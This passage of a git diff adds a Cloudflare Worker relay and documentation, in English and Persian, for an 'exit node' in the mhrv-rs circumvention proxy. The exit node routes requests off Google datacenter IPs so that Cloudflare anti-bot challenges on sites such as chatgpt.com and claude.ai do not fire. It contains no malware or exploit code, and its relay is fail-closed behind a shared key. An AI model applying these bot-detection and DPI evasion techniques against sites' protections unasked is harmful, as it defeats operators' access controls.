+| Per-execution wall budget | ~6 min, per-URL | 30 s, per-call (would become per-chunk if batching ships) |
+| Per-response size cap | ~50 MB (Apps Script doc'd) | bounded by Worker memory (128 MB free tier); ~tens of MB in practice with the base64 conversion |
+| Response header casing | preserved as origin sent it | lowercased (Workers' `Headers.forEach` normalises). Matters only for downstream tools that compare header names case-sensitively; mhrv-rs is case-insensitive. |
+| YouTube long-form playback | OK (6-min cliff) | WORSE (30-s cliff) |
+| Telegram / chat snappiness | baseline | noticeably better |
+| Cloudflare anti-bot on target | datacenter IP | worker-internal IP (often stricter) |
+| Spreadsheet response cache | available (opt-in) | not in this variant |
+| Deployment complexity | 1 thing to maintain | 2 things to keep in sync |
+
+If those trade-offs land on the right side for you, deploy this variant. If not — or if you don't have a Cloudflare account — stay on `Code.gs`.
+
+## Important limitation: not compatible with `mode: "full"`
+
+`Code.cfw.gs` only ports the HTTP-relay path (modes 1 + 2 in `CodeFull.gs`). The raw-TCP/UDP tunnel ops that `mode: "full"` depends on (modes 3 + 4 in `CodeFull.gs` — required for Android full-mode coverage of WhatsApp / Telegram / messengers / any non-HTTPS-MITM-able app) are **not** ported. If you're on full mode and looking for messenger speed-ups, this variant won't help — that's a different design that would need to ride on top of Cloudflare's TCP Sockets API + Durable Objects, with no equivalent for UDP. See the discussion in [issue #380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) for context.
diff --git a/assets/cloudflare/worker.js b/assets/cloudflare/worker.js
new file mode 100644
index 00000000..f672194b
--- /dev/null
+++ b/assets/cloudflare/worker.js
@@ -0,0 +1,302 @@
+/**
+ * MHR-CFW Exit Worker — Cloudflare Workers companion to Code.cfw.gs.
+ *
+ * Architecture (alternative backend, opt-in):
+ *   mhrv-rs → Apps Script (Code.cfw.gs) → THIS Worker → target site
+ *
+ * Apps Script in this configuration is a thin relay: it authenticates
+ * the inbound request from mhrv-rs, then forwards to this Worker. The
+ * Worker does the actual outbound fetch(es), base64-encodes the body,
+ * and returns the same JSON envelope shape the standard Code.gs would
+ * have returned. The mhrv-rs client is unaware that the work happened
+ * on Cloudflare — same `{u, m, h, b, ct, r}` request, same `{s, h, b}`
+ * response.
+ *
+ * Two request shapes are accepted:
+ *   1. Single:  { k, u, m, h, b, ct, r }            → { s, h, b }
+ *   2. Batch:   { k, q: [{u,m,h,b,ct,r}, ...] }     → { q: [{s,h,b} | {e}, ...] }
+ *
+ * The batch shape is what makes this design actually save Apps Script
+ * UrlFetchApp quota. Without it, Code.cfw.gs would have to do
+ * `UrlFetchApp.fetchAll(N worker calls)` to fan out an N-URL batch,
+ * which costs N quota — same as the standard Code.gs. With it,
+ * Code.cfw.gs does ONE fetch to this Worker (1 quota) and we fan out
+ * inside the Worker via Promise.all. For an N-URL batch that is an
+ * Nx saving — latent today: README.md notes mhrv-rs sends no batches.
+ *
+ * Why bother:
+ *   - Faster per-call latency (~10-50 ms at CF edge vs ~250-500 ms in
+ *     Apps Script), which matters most for many small requests
+ *     (Telegram realtime, page navigation chatter).
+ *   - Apps Script *runtime* quota (90 min/day on consumer accounts)
+ *     stretches further because GAS spends each call almost entirely
+ *     on its single forward to the Worker rather than on body fetch
+ *     + base64 + header munging.
+ *   - With the batch shape (above), Apps Script *UrlFetchApp count*
+ *     quota also stretches roughly Nx for an N-URL batch — but only
+ *     once a client sends batches (README.md: mhrv-rs does not yet).
+ *
+ * What this does NOT change:
+ *   - Cloudflare anti-bot challenges on the destination. The exit IP
+ *     becomes a Workers IP (inside Cloudflare's network), which CF's
+ *     own anti-bot can fingerprint as a worker-internal request —
+ *     often *stricter* than a Google IP. This is a different problem
+ *     than DPI bypass; see docs.
+ *   - YouTube long-form streaming gets WORSE, not better. Apps Script
+ *     allows ~6 min wall per execution; CF Workers cap at 30s wall.
+ *     The SABR cliff arrives sooner. Keep the standard `apps_script`
+ *     mode (Code.gs) for YouTube-heavy use.
+ *   - The 30s wall now applies to the *slowest URL in the batch*
+ *     because Promise.all only resolves once every fetch finishes.
+ *     mhrv-rs already retries failed batch items individually, so a
+ *     single slow target degrades to a per-item timeout rather than
+ *     a hard failure — but it's a real behavioural difference vs the
+ *     per-URL wall under the standard Code.gs path.
+ *
+ * Deployment:
+ *   1. Cloudflare dashboard → Workers & Pages → Create → Hello World
+ *   2. Edit code → delete the template, paste this entire file
+ *   3. Change AUTH_KEY below to the same value you set in Code.cfw.gs
+ *      AND in your mhrv-rs config.json (auth_key). All three must match.
+ *   4. Deploy. Note the *.workers.dev URL; paste it into Code.cfw.gs as
+ *      WORKER_URL.
+ *
+ * SECURITY NOTE: AUTH_KEY is the only thing that keeps this Worker
+ * from becoming an open HTTP-relay for arbitrary attackers if its URL
+ * leaks. While AUTH_KEY is still the template placeholder the Worker
+ * fails closed (every request gets a 500), so it must be changed
+ * before first use. Same secret as Code.cfw.gs by convention — if you
+ * want compartmentalisation, edit Code.cfw.gs to send the Worker a
+ * different key than the one it accepts from mhrv-rs.
+ *
+ * Hardened over the upstream mhr-cfw worker.js by adding the AUTH_KEY
+ * check and batch handling. Upstream credit: github.com/denuitt1/mhr-cfw.
+ */
+
+const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; // EDIT THIS ONE: shared secret compared against the request's `k` field
+const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; // template placeholder — leave as-is; fetch() returns 500 while AUTH_KEY still equals it
+
+// Loop-prevention tag. The Worker tags its OUTBOUND request to the
+// target with `x-relay-hop: 1` (see processOne). If a subsequent
+// request comes back into the Worker with that header set, the Worker
+// has been chained back to itself somehow — most likely the user's
+// `item.u` resolved to this Worker's own URL. Bail out instead of
+// fetching to avoid an unbounded Worker-to-Worker request loop.
+//
+// Note: Code.cfw.gs does NOT set this header on its GAS→Worker call
+// (and could not check for it on inbound anyway — Apps Script's
+// doPost event doesn't expose request headers). So this guard
+// catches Worker-↔-Worker cycles, not GAS-↔-Worker cycles. The
+// `targetUrl.hostname === selfHost` check in processOne is the
+// primary defence for the common misconfiguration.
+const RELAY_HOP_HEADER = "x-relay-hop";
+
+// Soft cap on batch size. Cloudflare Workers allow up to 50
+// subrequests per invocation on the free tier (1000 on paid). We
+// keep a margin for retries and internal CF traffic. mhrv-rs's
+// typical batches are 5-30 URLs so this is rarely the binding limit.
+//
+// **Must match `WORKER_BATCH_CHUNK` in Code.cfw.gs.** If the GAS side
+// chunks at a different size, oversized chunks here return a top-level
+// error and the entire chunk's slots fail. Tune both together.
+const MAX_BATCH_SIZE = 40;
+
+// Hop-by-hop headers and headers Cloudflare manages itself. Stripped
+// before forwarding so the inbound request doesn't poison the outbound.
+// Kept in sync with Code.cfw.gs / Code.gs SKIP_HEADERS so the Worker
+// is correct as a defence-in-depth even when called directly (the
+// AUTH_KEY check is the primary gate, but GAS scrubs first in the
+// normal flow).
+const SKIP_HEADERS = new Set([ // entries are lowercase; processOne lowercases each key before lookup
+  "host",
+  "connection",
+  "content-length",
+  "transfer-encoding",
+  "proxy-connection",
+  "proxy-authorization",
+  "priority",
+  "te",
+]);
+
+export default {
+  async fetch(request) { // Worker entry point: config/method/hop/JSON/auth guards, then batch or single dispatch
+    // Fail-closed if the deployer forgot to change AUTH_KEY from the
+    // template default. Without this guard a forgotten edit would
+    // accept any client that also happens to send the placeholder —
+    // effectively running as an open relay. Prefer a loud 500 over
+    // a silent open door.
+    if (AUTH_KEY === DEFAULT_AUTH_KEY) {
+      return json({ e: "configure AUTH_KEY in worker.js" }, 500);
+    }
+
+    if (request.method !== "POST") { // both accepted request shapes arrive as a JSON POST body
+      return json({ e: "method not allowed" }, 405);
+    }
+
+    if (request.headers.get(RELAY_HOP_HEADER) === "1") { // our own outbound tag came back in: refuse (see RELAY_HOP_HEADER)
+      return json({ e: "loop detected" }, 508);
+    }
+
+    let req;
+    try {
+      req = await request.json();
+    } catch (_err) {
+      return json({ e: "bad json" }, 400);
+    }
+
+    if (!req || req.k !== AUTH_KEY) {
+      // Same shape as Code.cfw.gs unauthorized so downstream errors are
+      // uniform. The Worker URL is generally not user-discoverable; the
+      // GAS in front of it is the public surface, and probes hit GAS
+      // first. We don't bother with the decoy-HTML treatment here.
+      return json({ e: "unauthorized" }, 401);
+    }
+
+    const selfHost = new URL(request.url).hostname; // passed to processOne so it can refuse targets on this Worker's own host
+
+    // Batch mode: { k, q: [{u,m,h,b,ct,r}, ...] }. Process all items in
+    // parallel via Promise.all. Per-item failures are per-item `{e}`s in
+    // the response array; the envelope itself stays 200 unless the batch
+    // is malformed at the top level.
+    if (Array.isArray(req.q)) {
+      if (req.q.length === 0) return json({ q: [] });
+      if (req.q.length > MAX_BATCH_SIZE) {
+        return json({
+          e: "batch too large (" + req.q.length + " > " + MAX_BATCH_SIZE + ")",
+        }, 400);
+      }
+      const results = await Promise.all(
+        req.q.map((item) => processOne(item, selfHost).catch((err) => ({ // a rejected item becomes its own `{e}` slot, so Promise.all never rejects
+          e: "fetch failed: " + String(err),
+        })))
+      );
+      return json({ q: results });
+    }
+
+    // Single mode: { k, u, m, h, b, ct, r }
+    let result;
+    try {
+      result = await processOne(req, selfHost);
+    } catch (err) {
+      return json({ e: "fetch failed: " + String(err) }, 502);
+    }
+    if (result.e) {
+      // Any `{e}` result gets HTTP 400 in single mode, matching how
+      // standard Code.gs codes "bad url" etc. NOTE(review): this also
+      // covers processOne's "fetch failed" results — 502 may fit better.
+      return json(result, 400);
+    }
+    return json(result);
+  },
+};
+
+/**
+ * Process one item, whether it came in as the top-level single
+ * request or as one slot of a batch. Expected failures come back as
+ * `{ e }` objects; the promise can still reject (non-string `item.m`,
+ * body read error), which the callers' try/.catch turn into `{ e }`.
+ *
+ * Result shape mirrors what Code.gs would return for the same item:
+ *   - Success: { s: status, h: {...}, b: base64Body }
+ *   - Validation / fetch failure: { e: "..." }
+ */
+async function processOne(item, selfHost) {
+  if (!item || typeof item !== "object") {
+    return { e: "bad item" };
+  }
+  if (!item.u || typeof item.u !== "string" || !/^https?:\/\//i.test(item.u)) { // only absolute http(s) URLs are relayed
+    return { e: "bad url" };
+  }
+
+  let targetUrl;
+  try {
+    targetUrl = new URL(item.u);
+  } catch (_err) {
+    return { e: "bad url" };
+  }
+  if (targetUrl.hostname === selfHost) { // direct self-reference; anything else that loops back is caught by RELAY_HOP_HEADER
+    return { e: "self-fetch blocked" };
+  }
+
+  const headers = new Headers();
+  if (item.h && typeof item.h === "object") {
+    for (const [k, v] of Object.entries(item.h)) {
+      if (SKIP_HEADERS.has(k.toLowerCase())) continue;
+      try {
+        headers.set(k, v);
+      } catch (_err) {
+        // Worker rejects some headers (e.g. forbidden ones); skip
+        // rather than fail the whole item.
+      }
+    }
+  }
+  headers.set(RELAY_HOP_HEADER, "1"); // set after the copy loop so a client-supplied value cannot override the tag
+
+  const method = (item.m || "GET").toUpperCase(); // throws TypeError if item.m is truthy but not a string; the caller maps that to `{e}`
+  const fetchOptions = {
+    method,
+    headers,
+    redirect: item.r === false ? "manual" : "follow", // only an explicit `r: false` disables redirect following
+  };
+
+  // Code.gs/UrlFetchApp tolerates a body on GET/HEAD (browsers don't
+  // do this, but custom clients sometimes do); Workers' native fetch
+  // throws TypeError if you set a body on a body-prohibited method.
+  // To match Code.gs's permissiveness, silently drop the body for
+  // those methods rather than failing the whole item.
+  const bodyAllowed = method !== "GET" && method !== "HEAD";
+  if (item.b && bodyAllowed) {
+    try {
+      const binary = Uint8Array.from(atob(item.b), (c) => c.charCodeAt(0)); // base64 → raw bytes; atob throws on malformed input
+      fetchOptions.body = binary;
+      if (item.ct && !headers.has("content-type")) { // `ct` is only a fallback; a content-type in `h` wins
+        headers.set("content-type", item.ct);
+      }
+    } catch (_err) {
+      return { e: "bad body base64" };
+    }
+  }
+
+  let resp;
+  try {
+    resp = await fetch(targetUrl.toString(), fetchOptions);
+  } catch (err) {
+    return { e: "fetch failed: " + String(err) };
+  }
+
+  const buffer = await resp.arrayBuffer(); // not wrapped in try: a body read failure rejects and is handled by the caller
+  const uint8 = new Uint8Array(buffer);
+
+  // Avoid call-stack overflow from String.fromCharCode.apply on big
+  // bodies — chunk the conversion.
+  let binary = "";
+  const chunkSize = 0x8000;
+  for (let i = 0; i < uint8.length; i += chunkSize) {
+    binary += String.fromCharCode.apply(null, uint8.subarray(i, i + chunkSize));
+  }
+  const base64 = btoa(binary);
+
+  // Note: Headers.forEach delivers keys lowercased per the Fetch
+  // spec, whereas Code.gs's getAllHeaders preserves the origin's
+  // casing. mhrv-rs treats headers case-insensitively, but anything
+  // downstream that does a case-sensitive string compare will see
+  // a backend-dependent difference. There is no Workers API to
+  // recover the origin casing, so we accept the divergence.
+  const responseHeaders = {};
+  resp.headers.forEach((v, k) => {
+    responseHeaders[k] = v;
+  });
+
+  return {
+    s: resp.status,
+    h: responseHeaders,
+    b: base64,
+  };
+}
+
+function json(obj, status = 200) { // Serialise `obj` into a JSON Response with the given HTTP status (default 200)
+  return new Response(JSON.stringify(obj), {
+    status,
+    headers: { "content-type": "application/json" },
+  });
+}
diff --git a/assets/exit_node/README.fa.md b/assets/exit_node/README.fa.md
new file mode 100644
index 00000000..e497adcd
--- /dev/null
+++ b/assets/exit_node/README.fa.md
@@ -0,0 +1,184 @@
+<div dir="rtl">
+
+# Exit node — دور زدن CF anti-bot برای ChatGPT / Claude / Grok / X
+
+بسیاری از سرویس‌های پشت Cloudflare، traffic از رنج IP datacenter
+گوگل را به‌عنوان bot flag می‌کنن + به‌جای صفحه واقعی یک Turnstile /
+CAPTCHA / 502 challenge می‌فرستن. `UrlFetchApp.fetch()` در Apps
+Script از همان رنج IP datacenter Google خروج می‌کنه، پس برای سایت‌هایی مانند:
+
+- **chatgpt.com / openai.com**
+- **claude.ai**
+- **grok.com / x.com**
+
+…مسیر apps_script-mode عادی mhrv-rs ارورهایی مثل
+`Relay error: json: key must be a string at line 2 column 1` یا
+`502 Relay error` می‌ده چون Code.gs در حال wrap کردن صفحه‌ی HTML
+challenge CF است که کلاینت نمی‌تونه parse کنه.
+
+**Exit node** یک handler کوچک HTTP به زبان TypeScript است که روی یک
+پلتفرم serverless TypeScript که خودت تأییدش می‌کنی deploy می‌شه و بین
+Apps Script و destination قرار می‌گیره. مسیر traffic این می‌شه:
+
+```
+Browser ─┐                                                ┌─→ Destination
+         │                                                │   (chatgpt.com)
+         ▼                                                │
+    mhrv-rs                                               │
+       │                                                  │
+       │  TLS به Google IP، SNI=www.google.com (DPI cover)│
+       ▼                                                  │
+   Apps Script (Google datacenter)                        │
+       │                                                  │
+       │  UrlFetchApp.fetch(EXIT_NODE_URL)                │
+       ▼                                                  │
+    exit node خودت (IP غیر گوگل)                          │
+       │                                                  │
+       │  fetch(real_url)                                 │
+       └──────────────────────────────────────────────────┘
+```
+
+Destination IP خروجی exit node رو می‌بینه، نه IP datacenter گوگل.
+Heuristic anti-bot CF نمی‌سوزه + صفحه واقعی برمی‌گرده.
+
+**نکته مهم:** leg user-side (Iran ISP → Apps Script) **بدون تغییر**
+است. ISP فقط TLS به Google IP می‌بینه — second hop کاملاً درون
+outbound Apps Script اجرا می‌شه، invisible از شبکه‌ی کاربر. پس DPI
+evasion property که mhrv-rs براش ساخته شده، دست نمی‌خوره.
+
+## راه‌اندازی
+
+handler در [`exit_node.ts`](exit_node.ts) plain TypeScript است که از
+APIهای web-standard (`Request`، `Response`، `fetch`) استفاده می‌کنه و
+روی هر پلتفرمی که serverless-fetch runtime داره اجرا می‌شه.
+
+### مراحل عمومی (روی هر host)
+
+۱. فایل [`exit_node.ts`](exit_node.ts) رو باز کنید و PSK پیش‌فرض رو در
+ابتدا عوض کنید:
+   ```ts
+   const PSK = "<your-strong-secret>";
+   ```
+   Strong secret تولید کنید با `openssl rand -hex 32` از terminal.
+   **placeholder رو در production نگذارید** — کد عمداً fail-closed است
+   (در هر request 503 برمی‌گردونه) تا placeholder replace نشده، تا
+   جلوی serve شدن به‌عنوان open relay accidentally گرفته بشه.
+۲. فایل رو روی host انتخابی **deploy** کنید (گزینه‌ها در ادامه).
+۳. URL public deployment رو **copy** کنید.
+۴. در `config.json` mhrv-rs، block `exit_node` اضافه کنید:
+   ```json
+   "exit_node": {
+     "enabled": true,
+     "relay_url": "https://your-deployed-exit-node.example.com",
+     "psk": "<همان PSK که در گام ۱ گذاشتید>",
+     "mode": "selective",
+     "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+   }
+   ```
+۵. mhrv-rs رو **restart** کنید (Disconnect + Connect، یا `kill` +
+   restart binary).
+۶. **تست** کنید — `chatgpt.com` یا `grok.com` رو از browser pointed به
+   mhrv-rs proxy باز کنید. صفحه login واقعی رو می‌بینید، نه CF
+   challenge.
+
+config مثال کامل در
+[`config.exit-node.example.json`](../../config.exit-node.example.json)
+در root repo.
+
+### گزینه‌های hosting
+
+اسکریپت یک فایل self-contained است. هر host که می‌توانید signup کنید +
+به‌اش اعتماد دارید رو انتخاب کنید:
+
+| Host | توضیحات |
+|---|---|
+| **Deno Deploy** ([deno.com/deploy](https://deno.com/deploy)) | free tier برای personal use کافی است. با `deployctl deploy --prod exit_node.ts` یا GitHub Actions deploy کنید. همان web-standard API. |
+| **fly.io** | free tier با محدودیت. handler رو در یک server thin بسته‌بندی کنید (`Deno.serve(handler)` برای Deno یا یک Express wrapper برای Node) + Dockerfile اضافه کنید. IP دائم، region جغرافیایی قابل انتخاب. |
+| **VPS شخصی خودت** | از فایل آماده [`wrapper.ts`](wrapper.ts) استفاده کن: `deno run --allow-net --allow-env --allow-read wrapper.ts`. خودکار Deno / Bun / Node 22+ تشخیص می‌ده. حداکثر کنترل، ~۳-۵ دلار در ماه. |
+| **Cloudflare Workers** | **کمک نمی‌کنه.** CF Workers از IP space خود CF خروج می‌کنن، که CF anti-bot هنوز به‌عنوان worker-internal flag می‌کنه. |
+
+برای اکثر کاربرانی که مسیر local رو اجرا می‌کنن، Deno Deploy
+سریع‌ترین setup است. برای deployment طولانی‌مدت تحت کنترل کامل
+خودت، VPS کوچک شخصی ایده‌آل است.
+
+## انتخاب `selective` vs `full`
+
+| Mode | چی می‌کنه | کی استفاده کنید |
+|---|---|---|
+| `selective` (default) | فقط hosts در `hosts` از طریق exit node می‌رن؛ بقیه از مسیر Apps Script عادی | توصیه می‌شه. exit-node hop ~۲۰۰-۵۰۰ms به هر request اضافه می‌کنه — برای سایت‌هایی reserve کنید که نیاز به non-Google IP دارن. |
+| `full` | همه‌ی request‌ها از طریق exit node می‌رن | فقط زمانی که کل workload شما CF-anti-bot affected است، یا exit node خود سریع‌تر روی مسیر شبکه شما (rare). budget runtime host رو برای سایت‌هایی که نیاز ندارن می‌سوزونه. |
+
+## رفتار در صورت failure
+
+اگر exit node در دسترس نباشه، 5xx برمی‌گردونه، یا response malformed
+بفرسته، mhrv-rs **به‌طور خودکار به Apps Script relay عادی fallback
+می‌کنه**. در log یک خط `warn: exit node failed for ... — falling back
+to direct Apps Script` می‌بینید. سایت‌هایی که نیاز به exit node دارن در آن
+case fail می‌گیرن (CF challenge)، ولی سایر سایت‌ها کار می‌کنن — یک
+exit node down شما رو fully offline نمی‌کنه.
+
+## Security model
+
+PSK تنها چیز است که مانع می‌شه endpoint deployed یک public open proxy
+بشه. مثل password برخورد کنید:
+
+- **commit نکنید** PSK رو به source control. اکثر hostها به‌طور default
+  کد deployed رو private نگه می‌دارن؛ همان‌طور نگه دارید.
+- **publicly share نکنید** PSK رو. هر کسی که هم URL هم PSK رو داره
+  می‌تونه quota host شما رو به‌عنوان proxy خود استفاده کنه.
+- **rotate** اگر leak مشکوک هست. PSK رو در source deployed تغییر بدید،
+  redeploy کنید، سپس `psk` در `config.json` mhrv-rs رو update + restart.
+
+اسکریپت همچنین شامل **loop guard** هست (refuse می‌کنه fetch host خود)
++ **placeholder check** (در صورت `PSK === "CHANGE_ME_TO_A_STRONG_SECRET"`
+return 503 می‌کنه) تا یک fresh deploy بدون setup نتونه به‌طور
+accidentally به‌عنوان open relay سرو بشه.
+
+## چرا default-on نیست
+
+- ۲۰۰-۵۰۰ms به هر request اضافه می‌کنه (hop اضافی)
+- budget bandwidth free-tier host رو می‌سوزونه
+- برای سایت‌هایی که CF anti-bot ندارن benefit نداره
+- Setup یک account جداگانه روی پلتفرم third-party می‌خواد
+
+پس `enabled: false` default است. کاربرانی که خصوصاً به ChatGPT / Claude /
+Grok اهمیت می‌دن opt in؛ همه‌ی دیگران lighter اجرا می‌کنن.
+
+## Troubleshooting
+
+**`exit node refused or errored: unauthorized`** — PSK mismatch.
+بررسی کنید `psk` در `config.json` دقیقاً با `PSK` constant در source
+deployed match هست. whitespace + quoting مهم است.
+
+**`exit node refused or errored: exit_node misconfigured: PSK is still
+the placeholder`** — فراموش کردید `CHANGE_ME_TO_A_STRONG_SECRET` رو
+در source جایگزین کنید. فایل deployed رو edit + save + redeploy کنید.
+
+**`exit node failed for ...: connection refused`** — URL اشتباه است
+یا deployment live نیست. با hit کردن URL مستقیم از browser verify
+کنید — باید `{"e":"method_not_allowed"}` برگردونه (handler expects
+POST).
+
+**`exit node failed for ...: timeout`** — outbound host slow است
+یا destination slow. region متفاوت رو امتحان کنید، یا latency
+trade-off رو accept کنید.
+
+**سایت همچنان CF challenge نشون می‌ده بعد از enable exit node** — CF
+IP host شما رو هم flag کرده. بعضی hosting provider‌ها outbound IP
+space‌شون روی CF bot blocklist است. workarounds: host دیگه امتحان
+کنید (VPS شخصی شما clean IP می‌ده)، یا سایت رو به `passthrough_hosts`
+اضافه کنید (MITM رو bypass می‌کنه؛ از real IP ISP شما استفاده
+می‌کنه).
+
+## همچنین ببینید
+
+- [English version](README.md) of this doc
+- [`exit_node.ts`](exit_node.ts) — منبع handler (با hardening)
+- [`config.exit-node.example.json`](../../config.exit-node.example.json)
+  — config مثال کامل
+- Issue [#382](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/382)
+  — thread tracking canonical Cloudflare anti-bot
+- Issue [#309](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/309)
+  — roadmap CF WARP integration (approach جایگزین، longer-horizon)
+
+</div>
diff --git a/assets/exit_node/README.md b/assets/exit_node/README.md
new file mode 100644
index 00000000..be84bcda
--- /dev/null
+++ b/assets/exit_node/README.md
@@ -0,0 +1,183 @@
+# Exit node — bypassing CF anti-bot for ChatGPT / Claude / Grok / X
+
+Many Cloudflare-fronted services flag traffic from Google datacenter
+IPs as bots and serve a Turnstile / CAPTCHA / 502 challenge instead of
+the real page. `UrlFetchApp.fetch()` in Apps Script always exits from
+Google's datacenter IP space, so for sites like:
+
+- **chatgpt.com / openai.com**
+- **claude.ai**
+- **grok.com / x.com**
+
+…mhrv-rs's normal apps_script-mode path returns errors like `Relay
+error: json: key must be a string at line 2 column 1` or `502 Relay
+error` because Code.gs is wrapping a CF challenge HTML page that the
+client can't parse as relay JSON.
+
+The **exit node** is a small TypeScript HTTP handler you deploy on a
+serverless TypeScript host you control. It sits between Apps Script
+and the destination, so the request chain becomes:
+
+```
+Browser ─┐                                                ┌─→ Destination
+         │                                                │   (chatgpt.com)
+         ▼                                                │
+    mhrv-rs                                               │
+       │                                                  │
+       │  TLS to Google IP, SNI=www.google.com (DPI cover)│
+       ▼                                                  │
+   Apps Script (Google datacenter)                        │
+       │                                                  │
+       │  UrlFetchApp.fetch(EXIT_NODE_URL)                │
+       ▼                                                  │
+    your exit node (non-Google IP)                        │
+       │                                                  │
+       │  fetch(real_url)                                 │
+       └──────────────────────────────────────────────────┘
+```
+
+The destination sees the exit node's outbound IP, not a Google
+datacenter IP. CF's anti-bot heuristic doesn't fire and the real page
+comes back.
+
+**Important property preserved:** the user-side leg (Iran ISP →
+Apps Script) is unchanged. The ISP only sees TLS to a Google IP — the
+second hop happens entirely inside Apps Script's outbound, invisible
+from the user's network. The DPI evasion property mhrv-rs is built
+around stays intact.
+
+## Setup
+
+The handler in [`exit_node.ts`](exit_node.ts) is plain TypeScript that
+uses only web-standard APIs (`Request`, `Response`, `fetch`). It runs
+on any platform with a serverless-fetch runtime.
+
+### Generic steps (apply to every host)
+
+1. **Open `exit_node.ts`** and replace the placeholder PSK at the top:
+   ```ts
+   const PSK = "<your-strong-secret>";
+   ```
+   Generate a strong secret with `openssl rand -hex 32`. **Do not leave
+   the placeholder** — the script is deliberately fail-closed (returns
+   503 on every request until the placeholder is replaced) so a fresh
+   deploy without configuration can't accidentally serve as an open
+   relay.
+2. **Deploy** to your chosen host (see options below).
+3. **Copy the public URL** of the deployed handler.
+4. **In `mhrv-rs` config.json**, add an `exit_node` block:
+   ```json
+   "exit_node": {
+     "enabled": true,
+     "relay_url": "https://your-deployed-exit-node.example.com",
+     "psk": "<the same PSK you set in step 1>",
+     "mode": "selective",
+     "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+   }
+   ```
+5. **Restart mhrv-rs** (Disconnect + Connect, or kill + restart the
+   binary).
+6. **Test** — open `chatgpt.com` or `grok.com` from a browser pointed
+   at mhrv-rs's proxy. You should see the real login page, not a CF
+   challenge.
+
+A complete example config is at
+[`config.exit-node.example.json`](../../config.exit-node.example.json)
+in the repo root.
+
+### Hosting options
+
+The script is one self-contained file. Pick whichever host you can
+sign up for and trust:
+
+| Host | Notes |
+|---|---|
+| **Deno Deploy** ([deno.com/deploy](https://deno.com/deploy)) | Free tier covers personal use. Deploy via `deployctl deploy --prod exit_node.ts` or via GitHub Actions. Same web-standard API as the script expects. |
+| **fly.io** | Free tier with limits. Wrap the handler in a thin server (`Deno.serve(handler)` for Deno or an Express wrapper for Node) + add a Dockerfile. Persistent IPs, picks geographic region. |
+| **Your own VPS** | Use the included [`wrapper.ts`](wrapper.ts): `deno run --allow-net --allow-env --allow-read wrapper.ts`. Auto-detects Deno / Bun / Node 22+. Most control, ~$3-5/mo. |
+| **Cloudflare Workers** | **Doesn't help.** CF Workers exit through CF's own IP space, which CF anti-bot still flags as worker-internal traffic. |
+
+For most users running locally, Deno Deploy is the fastest setup. For
+a long-term deployment you control end-to-end, your own small VPS is
+ideal.
+
+## `selective` vs `full`
+
+| Mode | What it does | When to use |
+|---|---|---|
+| `selective` (default) | Only hosts in `hosts` route via the exit node; everything else takes the normal Apps Script path | Recommended. The exit-node hop adds ~200-500ms per request, so reserve it for sites that actually need a non-Google IP. |
+| `full` | Every request routes via the exit node | Only when your entire workload is CF-anti-bot affected, or when your exit node is faster than Apps Script on your network path (rare). Burns the exit node's runtime budget on sites that don't need it. |
+
+## Behaviour on failure
+
+If the exit node is unreachable, returns 5xx, or returns a malformed
+response, mhrv-rs **automatically falls back to the regular Apps
+Script relay**. The log shows a `warn: exit node failed for ... —
+falling back to direct Apps Script` line. The CF-affected sites then
+fail (CF challenge), but every other site keeps working — a downed
+exit node doesn't take you fully offline.
+
+## Security model
+
+The PSK is the only thing keeping the deployed endpoint from being a
+public open proxy. Treat it like a password:
+
+- **Don't commit** the PSK to source control. Most TypeScript hosts
+  default deployed code to private; keep it that way.
+- **Don't share publicly.** Anyone with both the URL and the PSK can
+  use the deployment as their own proxy and burn your runtime quota.
+- **Rotate** if you suspect a leak. Change the PSK in the deployed
+  source, redeploy, then update `psk` in `mhrv-rs` config.json and
+  restart.
+
+The script also includes a **loop guard** (refuses to fetch its own
+host) and a **placeholder check** (returns 503 if `PSK ===
+"CHANGE_ME_TO_A_STRONG_SECRET"`) so a fresh deploy without
+configuration can't be accidentally served as an open relay.
+
+## Why isn't this on by default?
+
+- Adds ~200-500ms per request through the exit-node hop
+- Burns the host's free-tier runtime quota
+- No benefit for sites that don't have CF anti-bot
+- Requires signing up for a separate third-party platform
+
+So `enabled: false` is the default. Users who specifically need
+ChatGPT / Claude / Grok opt in; everyone else runs lighter.
+
+## Troubleshooting
+
+**`exit node refused or errored: unauthorized`** — PSK mismatch.
+Double-check `psk` in `config.json` matches the `PSK` constant in your
+deployed source character-for-character. Whitespace and quoting
+matter.
+
+**`exit_node misconfigured: PSK is still the placeholder`** — you
+forgot to replace `CHANGE_ME_TO_A_STRONG_SECRET` in the source. Edit
+the deployed file, save, redeploy.
+
+**`exit node failed for ...: connection refused`** — the URL is wrong
+or the deployment isn't live. Verify by hitting the URL in a browser
+— it should respond with `{"e":"method_not_allowed"}` (the script
+expects POST).
+
+**`exit node failed for ...: timeout`** — the host's outbound or the
+destination is slow. Try a different region, or accept the latency
+trade-off.
+
+**Site still shows a CF challenge after enabling the exit node** —
+CF has flagged your host's IP too. Some hosting providers' outbound
+IP space is on CF's bot blocklist. Workarounds: try a different host
+(your own VPS gives you a clean IP), or add the affected site to
+`passthrough_hosts` to bypass the MITM and use your real ISP IP.
+
+## See also
+
+- [Persian (راهنمای فارسی)](README.fa.md) version of this doc
+- [`exit_node.ts`](exit_node.ts) — the handler source (with hardening)
+- [`config.exit-node.example.json`](../../config.exit-node.example.json)
+  — complete example mhrv-rs config
+- Issue [#382](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/382)
+  — canonical thread tracking Cloudflare anti-bot
+- Issue [#309](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/309)
+  — roadmap for CF WARP integration (alternative approach, longer-horizon)
diff --git a/assets/exit_node/exit_node.ts b/assets/exit_node/exit_node.ts
new file mode 100644
index 00000000..0d55045e
--- /dev/null
+++ b/assets/exit_node/exit_node.ts
@@ -0,0 +1,175 @@
+// mhrv-rs exit node — deploy as an HTTP endpoint on any serverless
+// TypeScript host with a public IP that isn't a Google datacenter
+// (Deno Deploy, fly.io, your own VPS, etc.). Uses only web-standard
+// `Request` / `Response` / `fetch` so it's portable across runtimes.
+//
+// Purpose: chain client → Apps Script → this exit node → destination.
+// Apps Script's UrlFetchApp can't reach Cloudflare-protected sites that
